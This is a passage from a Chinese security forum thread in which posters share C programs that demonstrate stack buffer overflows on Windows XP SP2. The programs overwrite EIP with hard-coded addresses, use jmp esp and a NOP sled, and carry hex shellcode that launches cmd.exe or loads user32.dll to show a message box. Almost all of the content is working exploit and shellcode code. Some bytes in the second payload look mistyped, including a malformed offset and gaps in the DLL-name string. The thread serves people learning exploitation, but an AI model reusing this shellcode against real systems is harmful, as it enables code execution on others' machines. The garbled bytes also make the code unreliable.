能力值:
( LV9,RANK:380 )
|
-
-
2 楼
汇编代码写的shellcode
http://forum.eviloctal.com/read-htm-tid-27342.html
C语言版:
有问题程序:
#include <stdio.h>
#include <windows.h>
int main()
{
char output[8];
char shellcode[]="111111112aaaAAAA";
strcpy(output,shellcode);
printf("%d",output);
return 0;
}
测试代码:
#include <stdio.h>
#include <windows.h>
int main()
{
char output[8];
char shellcode[]={"\x31\x31\x31\x31\x31\x31\x31\x31\x32\x61\x61"
"\x61\x41\x41\x41\x41\x41\x41\x41\x41"//前面填充EBP
"\x12\x45\xfa\x7f"//0x7ffa4512这个地址覆盖EIP
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x08"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xB8\xC7\x93\xBF\x77"
"\xFF\xD0"};
strcpy(output,shellcode);
printf("%d",output);
return 0;
}
在XP SP2下测试通过
具体的溢出点触发,要看你分配了多少空间来决定,上面的代码,我分配了
char output[8];
如果是其他的话,你就要OD调式一下看看EIP被什么覆盖,之后就可以利用
jmp esp 的方式来执行栈顶上的指令了
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
3 楼
多谢!
我来看看,如果有不懂的地方,希望多帮忙!
|
能力值:
( LV2,RANK:10 )
在线值:
|
-
-
4 楼
我对编程还不是很精通看来我得继续努力了
|
能力值:
( LV12,RANK:210 )
在线值:
|
-
-
5 楼
#include <string.h>
#include <stdio.h>
#include <windows.h>
#define JUMPESP "\x28\x59\xD8\x77"
unsigned char eip[8] = JUMPESP;
unsigned char sploit[] =
{
"\x60"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xDB\x75"
"\xC6\x45\xDC\x73"
"\xC6\x45\xDD\x65"
"\xC6\x45\xDE\x72"
"\xC6\x45\xDF\x33"
"\xC6\x45\xE0\x32"
"\xC6\x45\xE7\x2E"
"\xC6\x45\xE\x64"
"\xC6\x45\xE9\x6C"
"\xC6\x45\xEA\x6C"
"\x88\x4D\xEB"
"\x8D\x45\xDB"
"\x50"
"\xB8\x77\x1D\x80\x7C"
"\xFF\xD0"
"\x55"
"\x51"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xEC\x53"
"\xC6\x45\xED\x75"
"\xC6\x45\xEE\x63"
"\xC6\x45\xEF\x63"
"\xC6\x45\xF0\x65"
"\xC6\x45\xF1\x73"
"\xC6\x45\xF2\x73"
"\x88\x4D\xF3"
"\xC6\x45\xF4\x57"
"\xC6\x45\xF5\x65"
"\xC6\x45\xF6\x20"
"\xC6\x45\xF7\x47"
"\xC6\x45\xF8\x6F"
"\xC6\x45\xF9\x74"
"\xC6\x45\xFA\x20"
"\xC6\x45\xFB\x49"
"\xC6\x45\xFC\x74"
"\xC6\x45\xFD\x21"
"\x88\x4D\xFE"
"\x51"
"\x8D\x45\xEC"
"\x50"
"\x8D\x45\xF4"
"\x50"
"\x51"
"\xB8\xEA\x04\xD5\x77"
"\xFF\xD0"
"\x33\xDB"
"\x53"
"\xB8\xA2\xCA\x81\x7C"
"\xFF\xD0"
"\x8B\xE5"
"\x61"
};
int MyCopy( char* str )
{
char buff1[50];
strcpy(buff1,str);
return 1;
}
int main()
{
HINSTANCE u32=NULL;
u32=LoadLibrary("user32.dll");
if(u32==NULL)
{
printf("cann't load user32.dll");
}
char Buff[1024];
memset(&Buff,0,sizeof(Buff));
for(int i=0;i<56;Buff[i++]=0x90);
strcpy(Buff+56,(char *)eip);//
strcpy(Buff+60,(char *)sploit);//
MyCopy(Buff);
printf("\n successed \n");
return 0;
}
|
能力值:
( LV12,RANK:210 )
在线值:
|
-
-
6 楼
XP SP2下测试通过
|
|
|